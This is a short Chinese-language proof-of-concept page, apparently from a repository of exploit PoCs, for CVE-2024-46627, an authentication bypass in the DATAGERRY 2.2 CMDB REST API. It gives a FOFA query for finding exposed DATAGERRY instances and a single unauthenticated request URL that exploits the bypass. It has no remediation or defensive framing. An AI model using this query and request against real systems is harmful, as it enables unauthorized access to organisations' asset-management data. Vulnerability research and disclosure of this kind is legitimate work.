POC/wpoc/DATAGERRY/DATAGERRY REST API 身份验证绕过漏洞(CVE-2024-46627).md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

836 B
Raw Blame History

DATAGERRY REST API 身份验证绕过漏洞(CVE-2024-46627)

DATAGERRY是DATAGerry开源的一个开源 CMDB 和资产管理工具。DATAGERRY 2.2版本存在安全漏洞该漏洞源于存在不正确权限改造允许攻击者通过精心设计的Web请求绕过权限验证而执行任意命令。

fofa

title="datagerry"

poc

使用浏览器请求
http://x.x.x.x/rest/users/1/settings/

img

img